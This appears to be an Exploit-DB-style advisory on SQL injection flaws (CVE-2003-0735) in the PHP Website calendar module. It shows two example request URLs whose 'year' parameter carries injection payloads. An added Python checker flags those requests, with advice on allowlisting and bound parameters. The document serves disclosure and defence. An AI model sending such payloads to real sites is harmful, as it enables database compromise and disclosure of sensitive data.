PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection

Author: Lorenzo Hernandez Garcia-Hierro
type: webapps
platform: php
port: 
date_added: 2003-08-11  
date_updated: 2012-11-29  
verified: 1  
codes: CVE-2003-0735;OSVDB-2410  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23013.txt  
source: https://www.securityfocus.com/bid/8390/info

Multiple SQL injection vulnerabilities have been reported in PHP Website. These issues may be exploited by sending a malicious request to the calendar script. Possible consequences of exploitation include compromise of the site and disclosure of sensitive information.

http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=day&year=2003%00-1&month=

http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1
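
A defender-side check for the two requests above, as an added example that is not part of the original advisory or of the PHP Website code: it decodes a calendar request and flags `year` or `month` values that are not plain integers. The function name, the accepted ranges, and the rule that an empty value is rejected are assumptions; the first two sample inputs are the advisory's requests with the line wraps joined and the host and path prefix dropped, and the third is constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed allowlist (not taken from the application): integer-only parameters
# of the calendar module and the range each may take.
INT_PARAMS = {"year": (1000, 9999), "month": (1, 12)}

def check_calendar_request(url):
    """Return (param, reason) findings for a calendar-module request URL."""
    # Keep blank values and duplicates: both are worth inspecting.
    query = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if dict(query).get("module") != "calendar":
        return []
    findings = []
    for name, value in query:  # value is already percent-decoded
        if name not in INT_PARAMS:
            continue
        low, high = INT_PARAMS[name]
        if "\x00" in value:
            findings.append((name, "NUL byte"))
        elif not re.fullmatch(r"[0-9]{1,4}", value):
            findings.append((name, "not a plain integer"))
        elif not low <= int(value) <= high:
            findings.append((name, "out of range"))
    return findings

SAMPLE_REQUESTS = [
    # First request from the advisory.
    "/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=",
    # Second request from the advisory, split where the page wraps it.
    "/index.php?module=calendar&calendar[view]"
    "=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%"
    "20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%"
    "29%20and%20active%3d1",
    # Constructed benign request for comparison.
    "/index.php?module=calendar&calendar[view]=month&month=11&year=2003",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(check_calendar_request(request) or "ok", request[:60])
```

The same allowlist belongs in the application itself, with the validated integers then passed to the database as bound parameters instead of being concatenated into the query.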